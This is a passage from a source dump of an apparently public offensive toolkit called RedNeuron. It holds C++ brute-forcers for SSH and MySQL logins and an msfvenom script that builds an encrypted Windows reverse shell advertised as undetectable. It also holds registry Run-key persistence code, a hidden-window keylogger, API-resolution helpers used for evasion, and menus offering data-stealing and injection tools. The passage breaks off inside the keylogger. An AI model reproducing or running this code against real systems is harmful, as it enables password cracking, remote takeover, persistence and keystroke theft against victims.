line)) { 13 | passwords.push_back(line); 14 | } 15 | } 16 | else { 17 | cout << "Error opening file: " << fileName << endl; 18 | } 19 | return passwords; 20 | } -------------------------------------------------------------------------------- /code/bruteforce/mysql/bruteMySQL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/bruteforce/mysql/bruteMySQL -------------------------------------------------------------------------------- /code/bruteforce/mysql/bruteMySQL.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "SQL.h" 4 | #include 5 | #include 6 | #include 7 | #include "utils/WordlistToVector.h" 8 | 9 | using namespace std; 10 | 11 | int main(){ 12 | bool result; 13 | 14 | cout << "\n\tMySQL Brute Force\n" << endl; 15 | 16 | string file = ""; 17 | string user = ""; 18 | string server = ""; 19 | int intentos = 1; 20 | 21 | cout << "Server: "; 22 | cin >> server; 23 | 24 | cout << "Path of Wordlist: "; 25 | cin >> file; 26 | 27 | cout << "Database user: "; 28 | cin >> user; 29 | 30 | cout << endl << endl; 31 | 32 | vector passwords = readPasswordsFromFile(file); 33 | 34 | SQL sql = SQL(server, user, "a", "mysql"); 35 | 36 | for(int i = 0; i < passwords.size(); i++){ 37 | sql.setPassword(passwords[i]); 38 | result = sql.connect(); 39 | 40 | cout << "Password: " << i << "/"<< passwords[i].c_str() << "\r" << flush; 41 | intentos++; 42 | 43 | if(!result){} 44 | else{ 45 | cout<< "Password Found: " << passwords[i] << endl; 46 | break; 47 | } 48 | } 49 | 50 | return 0; 51 | 52 | } -------------------------------------------------------------------------------- /code/bruteforce/mysql/utils/ColorClass.h: -------------------------------------------------------------------------------- 1 | #include 2 | #ifndef COLORCLASS_H 3 | #define COLORCLASS_H 4 | 5 | using namespace std; 6 | 7 | class Colorclass 8 | { 9 | public: 10 | void red(string text){ 11 | cout << "\033[31m" << text << "\033[0m"; 12 | } 13 | void blue(string text){ 14 | cout << "\033[34m" << text << "\033[0m"; 15 | } 16 | void yellow(string text){ 17 | cout << "\033[33m" << text << "\033[0m"; 18 | } 19 | void black(string text){ 20 | cout << "\033[30m" << text << "\033[0m"; 21 | } 22 | void green(string text){ 23 | cout << "\033[32m" << text << "\033[0m"; 24 | } 25 | void cyan(string text){ 26 | cout << "\033[36m" << text << "\033[0m"; 27 | } 28 | }; 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /code/bruteforce/mysql/utils/WordlistToVector.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | using namespace std; 6 | 7 | vector readPasswordsFromFile(string fileName) { 8 | vector passwords; 9 | ifstream file(fileName); 10 | if (file.is_open()) { 11 | string line; 12 | while (getline(file, line)) { 13 | passwords.push_back(line); 14 | } 15 | } 16 | else { 17 | cout << "Error opening file: " << fileName << endl; 18 | } 19 | return passwords; 20 | } -------------------------------------------------------------------------------- /code/bruteforce/mysql/utils/colors.h: -------------------------------------------------------------------------------- 1 | #include 2 | #ifndef COLORCLASS_H 3 | #define COLORCLASS_H 4 | 5 | using namespace std; 6 | 7 | class Colorclass 8 | { 9 | public: 10 | void red(string text){ 11 | cout << "\033[31m" << text << "\033[0m"; 12 | } 13 | void blue(string text){ 14 | cout << "\033[34m" << text << "\033[0m"; 15 | } 16 | void yellow(string text){ 17 | cout << "\033[33m" << text << "\033[0m"; 18 | } 19 | void black(string text){ 20 | cout << "\033[30m" << text << "\033[0m"; 21 | } 22 | void green(string text){ 23 | cout << "\033[32m" << text << "\033[0m"; 24 | } 25 | void cyan(string text){ 26 | cout << "\033[36m" << text << "\033[0m"; 27 | } 28 | }; 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /code/bruteforce/mysql/wordlist.txt: -------------------------------------------------------------------------------- 1 | sdsad 2 | kpassword 3 | asdasd 4 | dsadasd 5 | sad 6 | dsadsad 7 | password 8 | sad 9 | dsad 10 | ewqe 11 | sadsad 12 | asdadsa 13 | passwordx 14 | -------------------------------------------------------------------------------- /code/bruteforce/ssh/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | "tasks": [ 3 | { 4 | "type": "cppbuild", 5 | "label": "C/C++: g++ compilar archivo activo", 6 | "command": "/usr/bin/g++", 7 | "args": [ 8 | "-fdiagnostics-color=always", 9 | "-g", 10 | "${file}", 11 | "-o", 12 | "${fileDirname}/${fileBasenameNoExtension}" 13 | ], 14 | "options": { 15 | "cwd": "${fileDirname}" 16 | }, 17 | "problemMatcher": [ 18 | "$gcc" 19 | ], 20 | "group": { 21 | "kind": "build", 22 | "isDefault": true 23 | }, 24 | "detail": "Tarea generada por el depurador." 25 | } 26 | ], 27 | "version": "2.0.0" 28 | } -------------------------------------------------------------------------------- /code/bruteforce/ssh/Banner.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | using namespace std; 5 | 6 | int banner(){ 7 | cout << "\033[1;31m"; //Este código ANSI cambia el color del texto a rojo 8 | string border(35, '*'); 9 | cout << border << endl; 10 | string text = "BruteSSH"; 11 | int center = (35 - text.length()) / 2; 12 | cout << "" << string(center, ' ') << text << string(center, ' ') << "" << endl; 13 | cout << border << endl; 14 | cout << "\033[0m"; //Este código ANSI vuelve al color de texto predeterminado 15 | return 0; 16 | } 17 | -------------------------------------------------------------------------------- /code/bruteforce/ssh/BruteForce.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "Host.h" 6 | #include "Utils/WordlistToVector.h" 7 | #include "Banner.h" 8 | 9 | using namespace std; 10 | 11 | 12 | int main(){ 13 | ssh_session session; 14 | int check; 15 | string ip; 16 | string user; 17 | string file; 18 | cout<>user; 23 | cout<<"IP: "; 24 | cin>>ip; 25 | cout<<"Path of Wordlist: "; 26 | cin>>file; 27 | vector passwords = readPasswordsFromFile(file); 28 | cout< 2 | #include 3 | 4 | using namespace std; 5 | 6 | class Host{ 7 | string ip; 8 | int port; 9 | string user; 10 | 11 | Host(string ip,int port,string user){ 12 | } 13 | 14 | }; -------------------------------------------------------------------------------- /code/bruteforce/ssh/Host.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "Utils/ColorClass.h" 5 | 6 | 7 | using namespace std; 8 | 9 | class SSHHost{ 10 | public: 11 | string ip; 12 | string user; 13 | 14 | SSHHost(string ip,string user){ 15 | this->ip = ip; 16 | this->user = user; 17 | } 18 | 19 | ssh_session SSHConnection(string ip, string user){ 20 | 21 | ssh_session session = ssh_new(); 22 | ssh_options_set(session, SSH_OPTIONS_HOST, ip.c_str()); 23 | 24 | int rc = ssh_connect(session); 25 | if (rc != SSH_OK){ 26 | red("\nServer connection unsuccesfull\n"); 27 | cout<<"Error: "< 2 | #include 3 | 4 | using namespace std; 5 | 6 | void red(string text) 7 | { 8 | cout << "\033[31m" << text << "\033[0m"; 9 | } 10 | void blue(string text) 11 | { 12 | cout << "\033[34m" << text << "\033[0m"; 13 | } 14 | void yellow(string text) 15 | { 16 | cout << "\033[33m" << text << "\033[0m"; 17 | } 18 | void black(string text) 19 | { 20 | cout << "\033[30m" << text << "\033[0m"; 21 | } 22 | void green(string text) 23 | { 24 | cout << "\033[32m" << text << "\033[0m"; 25 | } 26 | void cyan(string text) 27 | { 28 | cout << "\033[36m" << text << "\033[0m"; 29 | } 30 | -------------------------------------------------------------------------------- /code/bruteforce/ssh/Utils/WordlistToVector.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | using namespace std; 6 | 7 | vector readPasswordsFromFile(string fileName) { 8 | vector passwords; 9 | ifstream file(fileName); 10 | if (file.is_open()) { 11 | string line; 12 | while (getline(file, line)) { 13 | passwords.push_back(line); 14 | } 15 | } 16 | else { 17 | cout << "Error opening file: " << fileName << endl; 18 | } 19 | return passwords; 20 | } -------------------------------------------------------------------------------- /code/bruteforce/ssh/bruteSSH: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/bruteforce/ssh/bruteSSH -------------------------------------------------------------------------------- /code/bruteforce/ssh/wordlist.txt: -------------------------------------------------------------------------------- 1 | dsdsad 2 | fadsad 3 | dsad 4 | as12 5 | aas12 6 | sadasfd 7 | dafa 8 | s12 9 | sdasd 10 | dsad 11 | dsadas 12 | sads12 13 | sdsadas 14 | dsadds 15 | 16 | -------------------------------------------------------------------------------- /code/checks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | ENDCOLOR="\e[0m" 8 | 9 | echo -e "${YELLOW}[+] Checking Dependencies...${ENDCOLOR}\n" 10 | 11 | which x86_64-w64-mingw32-g++ >/dev/null 12 | a=$(echo $?) 13 | 14 | 15 | if [ $a == 0 ]; then 16 | echo -e "${GREEN}[+] Compiler Found ${ENDCOLOR}" 17 | else 18 | echo -e "${RED}[-] Compiler not Found${ENDCOLOR}" 19 | echo -e "You can install with: sudo apt-get install g++-mingw-w64" 20 | exit 21 | fi 22 | 23 | which msfvenom >/dev/null 24 | b=$(echo $?) 25 | 26 | if [ $b == 0 ]; then 27 | echo -e "${GREEN}[+] Payload Creator Found ${ENDCOLOR}" 28 | else 29 | echo -e "${RED}[-] Payload Creator not Found${ENDCOLOR}" 30 | echo -e "You can install following this guide: https://adamtheautomator.com/install-metasploit-on-ubuntu/" 31 | exit 32 | fi 33 | 34 | which python2 >/dev/null 35 | c=$(echo $?) 36 | 37 | if [ $c == 0 ]; then 38 | echo -e "${GREEN}[+] Python2 Found ${ENDCOLOR}" 39 | else 40 | echo -e "${RED}[-] Python2 not Found${ENDCOLOR}" 41 | exit 42 | fi 43 | 44 | sleep 3s 45 | clear 46 | 47 | -------------------------------------------------------------------------------- /code/create.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | using namespace std; 4 | 5 | void createrevshell() 6 | { 7 | cout << endl; 8 | system("bash code/msfvenom.sh"); 9 | } 10 | 11 | void createpersistence(){ 12 | string exe; 13 | string command; 14 | yellow("\n[+] Provide name of EXE you want to be persistent (include .exe)\n"); 15 | cyan("\nEXE = "); 16 | cin >> exe; 17 | command = "sed -i 's/REPLACE/\"" + exe + "\"/' code/persistence/runkeys2.cpp >/dev/null"; 18 | const int commandlength = command.length(); 19 | char* char_command = new char[commandlength + 1]; 20 | strcpy(char_command, command.c_str()); 21 | system("cp code/persistence/runkeys.cpp code/persistence/runkeys2.cpp"); 22 | system(char_command); 23 | system("bash code/persistence/check.sh"); 24 | } 25 | 26 | void createproclist(){ 27 | system("bash code/proclist/proclist.sh"); 28 | } 29 | 30 | void createWindowInjector(){ 31 | system("bash code/WindowInjector/WindowsInjector.sh"); 32 | } -------------------------------------------------------------------------------- /code/helpers.cpp: -------------------------------------------------------------------------------- 1 | #include "PEstructs.h" 2 | #include "helpers.h" 3 | #include 4 | 5 | typedef HMODULE (WINAPI * LoadLibrary_t)(LPCSTR lpFileName); 6 | LoadLibrary_t pLoadLibraryA = NULL; 7 | 8 | 9 | 10 | HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName) { 11 | 12 | // get the offset of Process Environment Block 13 | #ifdef _M_IX86 14 | PEB * ProcEnvBlk = (PEB *) __readfsdword(0x30); 15 | #else 16 | PEB * ProcEnvBlk = (PEB *)__readgsqword(0x60); 17 | #endif 18 | 19 | // return base address of a calling module 20 | if (sModuleName == NULL) 21 | return (HMODULE) (ProcEnvBlk->ImageBaseAddress); 22 | 23 | PEB_LDR_DATA * Ldr = ProcEnvBlk->Ldr; 24 | LIST_ENTRY * ModuleList = NULL; 25 | 26 | ModuleList = &Ldr->InMemoryOrderModuleList; 27 | LIST_ENTRY * pStartListEntry = ModuleList->Flink; 28 | 29 | for (LIST_ENTRY * pListEntry = pStartListEntry; // start from beginning of InMemoryOrderModuleList 30 | pListEntry != ModuleList; // walk all list entries 31 | pListEntry = pListEntry->Flink) { 32 | 33 | // get current Data Table Entry 34 | LDR_DATA_TABLE_ENTRY * pEntry = (LDR_DATA_TABLE_ENTRY *) ((BYTE *) pListEntry - sizeof(LIST_ENTRY)); 35 | 36 | // check if module is found and return its base address 37 | if (lstrcmpiW(pEntry->BaseDllName.Buffer, sModuleName) == 0) 38 | return (HMODULE) pEntry->DllBase; 39 | } 40 | 41 | // otherwise: 42 | return NULL; 43 | 44 | } 45 | 46 | FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName) { 47 | 48 | char * pBaseAddr = (char *) hMod; 49 | 50 | // get pointers to main headers/structures 51 | IMAGE_DOS_HEADER * pDosHdr = (IMAGE_DOS_HEADER *) pBaseAddr; 52 | IMAGE_NT_HEADERS * pNTHdr = (IMAGE_NT_HEADERS *) (pBaseAddr + pDosHdr->e_lfanew); 53 | IMAGE_OPTIONAL_HEADER * pOptionalHdr = &pNTHdr->OptionalHeader; 54 | IMAGE_DATA_DIRECTORY * pExportDataDir = (IMAGE_DATA_DIRECTORY *) (&pOptionalHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]); 55 | IMAGE_EXPORT_DIRECTORY * pExportDirAddr = (IMAGE_EXPORT_DIRECTORY *) (pBaseAddr + pExportDataDir->VirtualAddress); 56 | 57 | // resolve addresses to Export Address Table, table of function names and "table of ordinals" 58 | DWORD * pEAT = (DWORD *) (pBaseAddr + pExportDirAddr->AddressOfFunctions); 59 | DWORD * pFuncNameTbl = (DWORD *) (pBaseAddr + pExportDirAddr->AddressOfNames); 60 | WORD * pHintsTbl = (WORD *) (pBaseAddr + pExportDirAddr->AddressOfNameOrdinals); 61 | 62 | // function address we're looking for 63 | void *pProcAddr = NULL; 64 | 65 | // resolve function by ordinal 66 | if (((DWORD_PTR)sProcName >> 16) == 0) { 67 | WORD ordinal = (WORD) sProcName & 0xFFFF; // convert to WORD 68 | DWORD Base = pExportDirAddr->Base; // first ordinal number 69 | 70 | // check if ordinal is not out of scope 71 | if (ordinal < Base || ordinal >= Base + pExportDirAddr->NumberOfFunctions) 72 | return NULL; 73 | 74 | // get the function virtual address = RVA + BaseAddr 75 | pProcAddr = (FARPROC) (pBaseAddr + (DWORD_PTR) pEAT[ordinal - Base]); 76 | } 77 | // resolve function by name 78 | else { 79 | // parse through table of function names 80 | for (DWORD i = 0; i < pExportDirAddr->NumberOfNames; i++) { 81 | char * sTmpFuncName = (char *) pBaseAddr + (DWORD_PTR) pFuncNameTbl[i]; 82 | 83 | if (strcmp(sProcName, sTmpFuncName) == 0) { 84 | // found, get the function virtual address = RVA + BaseAddr 85 | pProcAddr = (FARPROC) (pBaseAddr + (DWORD_PTR) pEAT[pHintsTbl[i]]); 86 | break; 87 | } 88 | } 89 | } 90 | 91 | // check if found VA is forwarded to external library.function 92 | if ((char *) pProcAddr >= (char *) pExportDirAddr && 93 | (char *) pProcAddr < (char *) (pExportDirAddr + pExportDataDir->Size)) { 94 | 95 | char * sFwdDLL = _strdup((char *) pProcAddr); // get a copy of library.function string 96 | if (!sFwdDLL) return NULL; 97 | 98 | // get external function name 99 | char * sFwdFunction = strchr(sFwdDLL, '.'); 100 | *sFwdFunction = 0; // set trailing null byte for external library name -> library\x0function 101 | sFwdFunction++; // shift a pointer to the beginning of function name 102 | 103 | // resolve LoadLibrary function pointer, keep it as global variable 104 | if (pLoadLibraryA == NULL) { 105 | pLoadLibraryA = (LoadLibrary_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "LoadLibraryA"); 106 | if (pLoadLibraryA == NULL) return NULL; 107 | } 108 | 109 | // load the external library 110 | HMODULE hFwd = pLoadLibraryA(sFwdDLL); 111 | free(sFwdDLL); // release the allocated memory for lib.func string copy 112 | if (!hFwd) return NULL; 113 | 114 | // get the address of function the original call is forwarded to 115 | pProcAddr = hlpGetProcAddress(hFwd, sFwdFunction); 116 | } 117 | 118 | return (FARPROC) pProcAddr; 119 | } 120 | -------------------------------------------------------------------------------- /code/helpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName); 7 | FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName); 8 | -------------------------------------------------------------------------------- /code/mainshell.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "create.h" 4 | 5 | using namespace std; 6 | 7 | string op; 8 | 9 | int mainshell(){ 10 | op = "a"; 11 | while (op != "exit" && op != "Exit" && op != "EXIT" ){ 12 | cout<<"\nRedNeuron@main-> "; 13 | cin>>op; 14 | if (op == "create" || op == "Create" || op == "CREATE"){ 15 | createshell(); 16 | } 17 | if (op == "create help" || op == "Create Help" || op == "CREATE HELP"){ 18 | //createmenu(); 19 | } 20 | if (op == "create list" || op == "Create List" || op == "CREATE LIST"){ 21 | listcreate(); 22 | } 23 | if (op == "create revshell" || op == "Create Revshell" || op == "CREATE REVSHELL"){ 24 | createrevshell(); 25 | } 26 | if (op == "clear" || op == "Clear" || op == "CLEAR"){ 27 | system("clear"); 28 | } 29 | if (op == "help" || op == "Help" || op == "HELP"){ 30 | helpmenu(); 31 | } 32 | if (op == "list" || op == "List" || op == "LIST"){ 33 | commandsmenu(); 34 | } 35 | if (op == "commands" || op == "Commands" || op == "COMMANDS"){ 36 | commandsmenu(); 37 | } 38 | if (op == "create reverse shell" || op == "Create Reverse Shell" || op == "CREATE REVERSE SHELL"){ 39 | createrevshell(); 40 | } 41 | } 42 | green("\nBye Bye :)"); 43 | return 0; 44 | } -------------------------------------------------------------------------------- /code/menus.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include "ColorClass.h" 3 | 4 | using namespace std; 5 | 6 | int mainmenu() { 7 | yellow("\t RedNeuron\n"); 8 | yellow("\t Author S12 -> salsa"); 9 | yellow("\n\t Version 1.7 "); 10 | return 0; 11 | } 12 | 13 | void helpmenu(){ 14 | cyan("\nHELP MENU\n"); 15 | red("Disclaimer: Im not responsable of the use for this tool\n"); 16 | cyan("\nDeveloped with: C++ - Python - Bash\nVersion 1.7\n\nGithub: https://github.com/S12cybersecurity/RedNeuron\nMedium: https://medium.com/@s12deff\n\nCommands:\n- help -> List this Menu\n- list -> List available commands\n- commands -> List available commands\n- create -> Section to Create available Malware\n- bruteforce -> Section to perform bruteforce attacks\n- postexploitation -> Section to create PostExplotation Malware\n- clear -> Clear actual screen\n"); 17 | } 18 | 19 | void commandsmenu(){ 20 | cyan("\nCommands:\n- help -> List this Menu\n- list -> List available commands\n- commands -> List available commands\n- create -> Section to Create available Malware\n- bruteforce -> Section to perform bruteforce attacks\n- clear -> Clear actual screen\n"); 21 | } 22 | 23 | void createcommands(){ 24 | cyan("\nShell Commands:\n- help -> Show Help Menu\n- list -> List all malware available \n- commands -> List available commands\n- clear -> Clear actual screen\n\nMalware Commands:\n- reverse shell -> Create Undetectable Windows Reverse Shell\n- revshell -> Create Undetectable Windows Reverse Shell\n- persistence -> Create EXE to get Persistence in Windows Victim\n- proclist -> Create EXE to list all active processes (Name,PID,Parent PID,User Running it)\n- windowinjector -> Create EXE to inject Reverse Shell into a process via Window Name\n"); 25 | } 26 | 27 | void createmenu() { 28 | cyan("\nHelp Menu for Create\nIf you want to see all malware available execute 'list' command \n\nCreate Section in RedNeuron allow you to use this commands:\n\nShell Commands:\n- help -> Show Help Menu\n- list -> List all malware available \n- commands -> List available commands\n- clear -> Clear actual screen\n\nMalware Commands:\n- reverse shell -> Create Undetectable Windows Reverse Shell\n- revshell -> Create Undetectable Windows Reverse Shell\n- persistence -> Create EXE to get Persistence in Windows Victim\n- proclist -> Create EXE to list all active processes (Name,PID,Parent PID,User Running it)\n- windownjector -> Reverse Shell Injected in a Process via Window Name\n"); 29 | } 30 | 31 | void listcreate(){ 32 | cyan("\nYou can create this malware options:\n- Reverse Shell to Bypass Windows Defender (Command 'revshell' or 'reverse shell')\n- EXE to get Persistence in Windows Victim (Command 'persistence')\n- proclist -> Create EXE to list all active processes [Name,PID,Parent PID,User Running it] (Command 'proclist')\n- windowinjector -> Create EXE to inject Reverse Shell into a process via Window Name\n"); 33 | } 34 | 35 | void bruteforcemenu(){ 36 | cyan("\nBruteforce Shell Commands:\n- ssh -> Execute SSH Server Bruteforce\n- mysql -> Execute MySQL Bruteforce\n- help -> Display this menu\n- commands -> Display available commands\n- list -> List bruteforce victim options\n- exit -> Exit from RedNeuron\n"); 37 | } 38 | 39 | void bruteforcelist(){ 40 | cyan("\nList Bruteforce Attack Options:\n- SSH\n- MySQL\n"); 41 | } 42 | 43 | void postexploitationmenu(){ 44 | cyan("\nPost Exploitation Commands:\n- help -> Display this menu\n- commands -> Display available commands\n- list -> List post exploitation options\n- file-extractor -> Extract Files from Windows to RedNeuron (Linux)\n- mysql-stealer -> Steal MySQL Data\n- keylogger -> Store in file all keys pressed by user\n- exit -> Exit from RedNeuron\n"); 45 | } 46 | 47 | bool checkdependeces(){ 48 | system("bash code/checks.sh"); 49 | return true; 50 | } 51 | -------------------------------------------------------------------------------- /code/msfvenom.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | ENDCOLOR="\e[0m" 8 | 9 | echo -e "${YELLOW}[+] Create Undetectable Windows Reverse Shell\nProvide the following information about YOUR attacker machine${ENDCOLOR}\n" 10 | printf "IP = " 11 | read -r ip 12 | printf "PORT = " 13 | read -r port 14 | printf "PATH to save shell = " 15 | read -r shellpath 16 | 17 | 18 | 19 | echo -e "" 20 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ip LPORT=$port -f raw -o $shellpath/temp.raw >/dev/null 21 | cp code/revshell.cpp code/revshell2.cpp 2>/dev/null 22 | sudo python2 code/aesencrypt.py $shellpath/temp.raw >/dev/null 23 | x86_64-w64-mingw32-g++ code/revshell2.cpp code/helpers.cpp -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -o $shellpath/shell.exe -fpermissive 2/dev/null 27 | e=$(echo $?) 28 | 29 | if [ $e == 0 ]; then 30 | echo -e "${GREEN}[+] Shell Created Successfully - $shellpath/shell.exe${ENDCOLOR}" 31 | else 32 | echo -e "${RED}[-] Error Creating Shell${ENDCOLOR}\n" 33 | exit 34 | fi 35 | 36 | -------------------------------------------------------------------------------- /code/persistence/check.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | CYAN="\e[36m" 8 | 9 | 10 | ENDCOLOR="\e[0m" 11 | 12 | 13 | 14 | printf "${CYAN}\nPATH to save EXE = ${ENDCOLOR}" 15 | read -r exepath 16 | x86_64-w64-mingw32-g++ code/persistence/runkeys2.cpp -I/usr/share/mingw-w64/include/ -o $exepath/runkeys.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -Wmain 17 | 18 | ls $exepath/runkeys.exe >/dev/null 19 | e=$(echo $?) 20 | 21 | if [ $e == 0 ]; then 22 | echo -e "${GREEN}\n[+] File Created Successfully - runkeys.exe${ENDCOLOR}" 23 | else 24 | echo -e "${RED}[-] Error Creating File${ENDCOLOR}\n" 25 | exit 26 | fi -------------------------------------------------------------------------------- /code/persistence/runkeys.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char* tita; 7 | const char* exe; 8 | const char* exe2; 9 | 10 | using namespace std; 11 | 12 | int main() { 13 | exe = REPLACE; 14 | HKEY hkey = NULL; 15 | LONG res = RegOpenKeyEx(HKEY_CURRENT_USER,(LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey); 16 | if (res == ERROR_SUCCESS) { 17 | RegSetValueEx(hkey,(LPCSTR)"salsa", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 18 | RegCloseKey(hkey); 19 | } 20 | } 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /code/persistence/runkeys2.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char* tita; 7 | const char* exe; 8 | const char* exe2; 9 | 10 | using namespace std; 11 | 12 | int main() { 13 | exe = "calc.exe"; 14 | HKEY hkey = NULL; 15 | LONG res = RegOpenKeyEx(HKEY_CURRENT_USER,(LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey); 16 | if (res == ERROR_SUCCESS) { 17 | RegSetValueEx(hkey,(LPCSTR)"salsa", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 18 | RegCloseKey(hkey); 19 | } 20 | } 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/MySQL_DataStealer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | ENDCOLOR="\e[0m" 7 | 8 | cp code/postexploitation/MySQL-dataStealer/cg.exe . 9 | cp code/postexploitation/MySQL-dataStealer/libmysql.dll . 10 | cp code/postexploitation/MySQL-dataStealer/sqlop.exe . 11 | 12 | echo -e "${GREEN}\n[*]${ENDCOLOR} Creating cg.exe" 13 | echo -e "${GREEN}[*]${ENDCOLOR} Creating libmysql.dll" 14 | echo -e "${GREEN}[*]${ENDCOLOR} Creating sqlop.exe" 15 | 16 | echo -e "${GREEN}\n[*]${ENDCOLOR} Done!\n\nIn your current directory you will find the created files.\n\n[!] To use this tool you can follow the instructions in this article:\nLink: https://medium.com/@s12deff/mysql-data-stealer-hacking-mysql-26b960bb7d10\n" 17 | 18 | ./code/postexploitation/MySQL-dataStealer/server 19 | -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/cg.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/MySQL-dataStealer/cg.exe -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/libmysql.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/MySQL-dataStealer/libmysql.dll -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/MySQL-dataStealer/server -------------------------------------------------------------------------------- /code/postexploitation/MySQL-dataStealer/sqlop.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/MySQL-dataStealer/sqlop.exe -------------------------------------------------------------------------------- /code/postexploitation/file-extractor/client: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/file-extractor/client -------------------------------------------------------------------------------- /code/postexploitation/file-extractor/file-extractor.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | ENDCOLOR="\e[0m" 7 | 8 | 9 | cp code/postexploitation/file-extractor/fileExtractor.exe . 10 | 11 | echo -e "${GREEN}\n[*]${ENDCOLOR} Creating fileExtractor.exe" 12 | echo -e "${GREEN}[*]${ENDCOLOR} Done!" 13 | 14 | ./code/postexploitation/file-extractor/server 15 | 16 | 17 | echo -e "${GREEN}\n[*]${ENDCOLOR} Executing client to receive files" 18 | echo -e "${GREEN}[*]${ENDCOLOR} Done!" -------------------------------------------------------------------------------- /code/postexploitation/file-extractor/fileExtractor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/file-extractor/fileExtractor.exe -------------------------------------------------------------------------------- /code/postexploitation/file-extractor/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/file-extractor/server -------------------------------------------------------------------------------- /code/postexploitation/keylogger/keylogger.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // hook 6 | LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) { 7 | if (nCode == HC_ACTION && wParam == WM_KEYDOWN) { 8 | DWORD vkCode = ((KBDLLHOOKSTRUCT*)lParam)->vkCode; 9 | 10 | FILE* file; 11 | fopen_s(&file, "C:\\Users\\Public\\Music\\log.txt", "a"); 12 | if (file != NULL) { 13 | fprintf(file, "%c", vkCode); 14 | fclose(file); 15 | } 16 | } 17 | return CallNextHookEx(NULL, nCode, wParam, lParam); 18 | } 19 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 20 | // creating invisible window 21 | AllocConsole(); 22 | ShowWindow(GetConsoleWindow(), SW_HIDE); 23 | 24 | // set hook 25 | HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, 0); 26 | 27 | // wait for events 28 | MSG msg; 29 | while (GetMessage(&msg, NULL, 0, 0) > 0) { 30 | TranslateMessage(&msg); 31 | DispatchMessage(&msg); 32 | 